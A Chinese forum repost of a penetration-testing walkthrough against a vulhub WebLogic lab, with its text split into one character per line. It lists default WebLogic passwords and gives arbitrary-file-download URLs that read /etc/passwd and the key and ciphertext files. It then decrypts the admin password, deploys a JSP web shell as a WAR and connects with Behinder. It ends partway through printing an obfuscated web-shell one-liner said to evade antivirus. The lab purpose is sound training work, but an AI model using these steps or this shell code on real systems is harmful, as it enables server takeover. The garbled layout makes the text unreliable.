论坛
BBS
空间测绘
发表
发布文章
提问答疑
搜索
您还未登录
登录后即可体验更多功能
立即登录
我的收藏
提问答疑
我要投稿
文件上传
[15759] 2020-08-22_JBass弱口令及任意文件下载漏洞分析
文档创建者:
s7ckTeam
浏览次数:
8
最后更新:
2025-01-18
文件上传
8 人阅读
|
0 人回复
s7ckTeam
s7ckTeam
当前离线
积分
-58
6万
主题
-6万
回帖
-58
积分
管理员
积分
-58
发消息
2020-08-22_JBass弱口令及任意文件下载漏洞分析
J
B
a
s
s
弱
口
令
及
任
意
文
件
下
载
漏
洞
分
析
h
f
y
n
1
2
3
F
r
e
e
B
u
f
2
0
2
0
-
0
8
-
2
2
一
、
搭
建
一
、
搭
建
J
B
a
s
s
环
境
环
境
v
u
l
h
u
b
下
载
:
s
u
d
o
g
i
t
c
l
o
n
e
h
t
t
p
s
:
/
/
g
i
t
h
u
b
.
c
o
m
/
v
u
l
h
u
b
/
v
u
l
h
u
b
.
g
i
t
v
u
l
h
u
b
是
基
于
d
o
c
k
e
r
-
c
o
m
p
o
s
e
环
境
搭
建
的
,
里
面
集
成
了
很
多
的
漏
洞
版
本
,
例
如
:
v
u
l
h
u
b
里
面
又
有
很
多
个
漏
洞
,
每
一
个
文
件
夹
代
表
着
一
个
漏
洞
接
下
来
,
开
始
搭
建
v
u
l
h
u
b
环
境
:
搭
建
v
u
l
h
u
b
环
境
需
要
d
o
c
k
e
r
-
c
o
m
p
o
s
e
,
如
果
没
有
d
o
c
k
e
r
-
c
o
m
p
o
s
e
的
话
就
先
下
载
吧
下
载
:
s
u
d
o
a
p
t
i
n
s
t
a
l
l
d
o
c
k
e
r
-
c
o
m
p
o
s
e
d
o
c
k
e
r
-
c
o
m
p
o
s
e
和
v
u
l
h
u
b
都
安
装
完
后
:
进
入
到
v
u
l
h
u
b
/
w
e
b
l
o
g
i
c
选
择
,
w
e
a
k
_
p
a
s
s
w
o
r
d
,
弱
口
令
模
块
进
入
到
w
e
a
k
_
p
a
s
s
w
o
r
d
文
件
夹
后
,
执
行
s
u
d
o
d
o
c
k
e
r
-
c
o
m
p
o
s
e
b
u
i
l
d
对
文
件
进
行
编
译
:
前
提
是
当
前
文
件
夹
下
有
d
o
c
k
e
r
-
c
o
m
p
o
s
e
.
y
m
l
文
件
,
d
o
c
k
e
r
-
c
o
m
p
o
s
e
.
y
m
l
代
表
着
一
个
漏
洞
环
境
,
如
果
没
有
d
o
c
k
e
r
-
c
o
m
p
o
s
e
.
y
m
l
文
件
在
编
译
的
时
候
会
报
错
编
译
完
后
,
执
行
d
o
c
k
e
r
-
c
o
m
p
o
s
e
u
p
-
d
进
行
自
动
安
装
环
境
,
并
且
后
台
运
行
安
装
运
行
完
后
,
使
用
命
令
s
u
d
o
d
o
c
k
e
r
p
s
查
看
d
o
c
k
e
r
正
在
运
行
的
环
境
可
以
看
到
已
经
运
行
了
w
e
b
l
o
g
i
c
环
境
并
且
映
射
了
7
0
0
1
端
口
打
开
页
面
:
在
u
r
l
后
面
加
入
/
c
o
n
s
o
l
e
/
l
o
g
i
n
/
会
自
动
跳
转
到
登
录
页
面
,
W
e
b
l
o
g
i
c
常
见
弱
口
令
如
下
:
U
s
e
r
I
D
P
a
s
s
w
o
r
d
s
y
s
t
e
m
p
a
s
s
w
o
r
d
a
d
m
i
n
s
e
c
u
r
i
t
y
j
o
e
p
a
s
s
w
o
r
d
m
a
r
y
p
a
s
s
w
o
r
d
s
y
s
t
e
m
s
e
c
u
r
i
t
y
w
l
c
s
y
s
t
e
m
w
l
c
s
y
s
t
e
m
w
l
p
i
s
y
s
t
e
m
w
l
p
i
s
y
s
t
e
m
w
e
b
l
o
g
i
c
O
r
a
c
l
e
@
1
2
3
U
s
e
r
I
D
P
a
s
s
w
o
r
d
O
r
a
c
l
e
1
2
3
|
由
于
登
录
次
数
超
过
五
次
后
就
会
限
制
登
录
了
,
所
以
不
要
轻
易
的
进
行
暴
力
破
解
二
、
利
用
任
意
文
件
下
载
漏
洞
破
解
登
录
密
码
二
、
利
用
任
意
文
件
下
载
漏
洞
破
解
登
录
密
码
如
果
网
站
存
在
任
意
文
件
下
载
等
漏
洞
,
我
们
还
可
以
通
过
破
解
的
方
式
获
取
密
码
。
w
e
b
l
o
g
i
c
密
码
使
用
A
E
S
加
密
,
A
E
S
为
对
称
加
密
方
式
,
如
果
找
到
密
钥
/
密
文
即
可
解
密
。
W
e
b
l
o
g
i
c
将
用
户
的
密
文
与
密
钥
保
存
在
本
地
/
r
o
o
t
/
O
r
a
c
l
e
/
M
i
d
d
l
e
w
a
r
e
/
u
s
e
r
_
p
r
o
j
e
c
t
s
/
d
o
m
a
i
n
s
/
b
a
s
e
_
d
o
m
a
i
n
文
件
夹
中
,
分
别
为
如
下
两
个
文
件
:
.
/
s
e
c
u
r
i
t
y
/
S
e
r
i
a
l
i
z
e
d
S
y
s
t
e
m
I
n
i
.
d
a
t
密
钥
.
/
c
o
n
f
i
g
/
c
o
n
f
i
g
.
x
m
l
密
文
v
u
l
h
u
b
测
试
环
境
存
在
一
个
任
意
文
件
下
载
漏
洞
:
测
试
访
问
/
e
t
c
/
p
a
s
s
w
d
文
件
h
t
t
p
:
/
/
1
9
2
.
1
6
8
.
1
.
1
1
2
:
7
0
0
1
/
h
e
l
l
o
/
f
i
l
e
.
j
s
p
?
p
a
t
h
=
/
e
t
c
/
p
a
s
s
w
d
下
载
S
e
r
i
a
l
i
z
e
d
S
y
s
t
e
m
I
n
i
.
d
a
t
密
钥
:
右
键
保
存
到
本
地
下
载
密
文
:
h
t
t
p
:
/
/
1
9
2
.
1
6
8
.
1
.
1
1
2
:
7
0
0
1
/
h
e
l
l
o
/
f
i
l
e
.
j
s
p
?
p
a
t
h
=
/
r
o
o
t
/
O
r
a
c
l
e
/
M
i
d
d
l
e
w
a
r
e
/
u
s
e
r
_
p
r
o
j
e
c
t
s
/
d
o
m
a
i
n
s
/
b
a
s
e
_
d
o
m
a
i
n
/
c
o
n
f
i
g
/
c
o
n
f
i
g
.
x
m
l
可
以
直
接
用
浏
览
器
下
载
密
文
-
》
/
/
找
到
字
段
1
9
2
.
1
6
8
.
1
.
1
1
2
:
7
0
0
1
/
h
e
l
l
o
/
f
i
l
e
.
j
s
p
?
p
a
t
h
=
/
r
o
o
t
/
O
r
a
c
l
e
/
M
i
d
d
l
e
w
a
r
e
/
u
s
e
r
_
p
r
o
j
e
c
t
s
/
d
o
m
a
i
n
s
/
b
a
s
e
_
d
o
m
a
i
n
/
s
e
c
u
r
i
t
y
/
S
e
r
i
a
l
i
z
e
d
S
y
s
t
e
m
I
n
i
.
d
a
t
然
后
使
用
密
钥
和
密
文
进
行
解
密
:
有
了
密
码
后
就
可
以
登
录
后
台
:
用
户
名
:
w
e
b
l
o
g
i
c
密
码
:
O
r
a
c
l
e
@
1
2
3
工
具
下
载
地
址
:
h
t
t
p
s
:
/
/
g
i
t
h
u
b
.
c
o
m
/
T
i
d
e
S
e
c
/
D
e
c
r
y
p
t
_
W
e
b
l
o
g
i
c
_
P
a
s
s
w
o
r
d
三
、
通
过
部
署
功
能
上
传
三
、
通
过
部
署
功
能
上
传
w
e
b
_
S
h
e
l
l
进
入
后
台
后
,
点
击
部
署
,
然
后
点
击
安
装
:
然
后
点
击
文
件
上
传
:
这
里
的
一
句
话
要
压
缩
成
z
i
p
文
件
格
式
,
然
后
修
改
后
缀
为
w
a
r
再
上
传
:
点
击
下
一
步
:
再
点
击
下
一
步
:
再
点
击
下
一
步
进
行
部
署
:
再
点
击
下
一
步
进
行
安
装
:
在
点
击
下
一
步
完
成
安
装
:
最
后
完
成
安
装
:
访
问
s
h
e
l
l
路
径
是
上
下
文
跟
路
径
+
你
之
前
压
缩
的
j
s
p
文
件
名
,
而
不
是
压
缩
包
的
文
件
名
:
h
t
t
p
:
/
/
1
9
2
.
1
6
8
.
1
.
1
1
2
:
7
0
0
1
/
b
q
2
/
b
q
s
h
e
l
l
.
j
s
p
使
用
冰
蝎
链
接
:
执
行
命
令
:
四
、
冰
蝎
连
接
乱
码
问
题
四
、
冰
蝎
连
接
乱
码
问
题
导
致
冰
蝎
连
接
失
败
,
并
且
返
回
一
堆
乱
码
,
这
个
肯
定
是
s
h
e
l
l
编
码
的
问
题
。
刚
开
始
的
时
候
,
我
是
在
U
b
u
n
t
u
上
面
编
写
的
s
h
e
l
l
,
上
传
后
连
接
老
是
出
现
编
码
问
题
。
经
过
一
个
多
小
时
的
排
查
,
把
s
h
e
l
l
放
在
w
i
n
d
o
w
s
上
编
写
,
并
且
另
存
为
U
T
F
-
8
编
码
,
然
后
再
传
到
U
b
u
n
t
u
上
面
压
缩
成
Z
I
P
文
件
,
然
后
再
后
缀
名
为
w
a
r
,
然
后
再
上
传
到
部
署
页
面
,
然
后
再
用
冰
蝎
去
连
接
就
没
有
问
题
了
!
!
!
(
简
单
来
说
就
是
j
s
p
文
件
编
码
要
改
成
u
t
f
-
8
)
命
令
代
码
执
行
:
五
、
冰
蝎
五
、
冰
蝎
j
s
p
一
句
话
一
句
话
冰
蝎
工
具
:
h
t
t
p
s
:
/
/
g
i
t
h
u
b
.
c
o
m
/
r
e
b
e
y
o
n
d
/
B
e
h
i
n
d
e
r
/
r
e
l
e
a
s
e
s
j
s
p
一
句
话
:
听
说
这
个
是
过
3
6
0
的
精
彩
推
荐
精
彩
推
荐
<
%
@
p
a
g
e
i
m
p
o
r
t
=
"
j
a
v
a
.
u
t
i
l
.
*
,
j
a
v
a
x
.
c
r
y
p
t
o
.
*
,
j
a
v
a
x
.
c
r
y
p
t
o
.
s
p
e
c
.
*
"
%
>
<
%
!
c
l
a
s
s
U
e
x
t
e
n
d
u
0
0
7
3
C
l
a
s
s
L
o
a
d
e
r
{
U
(
C
l
a
s
s
L
o
a
d
e
r
c
)
{
s
u
p
e
r
(
c
)
;
}
p
u
b
l
i
c
C
l
a
s
s
g
(
b
y
t
e
[
]
b
)
{
r
e
t
u
r
n
s
u
p
e
r
.
d
e
f
i
n
e
C
l
a
s
s
(
b
,
阅
读
原
文
回复
举报
上一个主题
下一个主题
高级模式
B
Color
Image
Link
Quote
Code
Smilies
您需要登录后才可以回帖
登录
|
立即注册
本版积分规则
发表回复
!disable!!post_parseurl!
使用Markdown编辑器编辑
使用富文本编辑器编辑
回帖后跳转到最后一页
浏览过的版块
渗透测试
发表
文件上传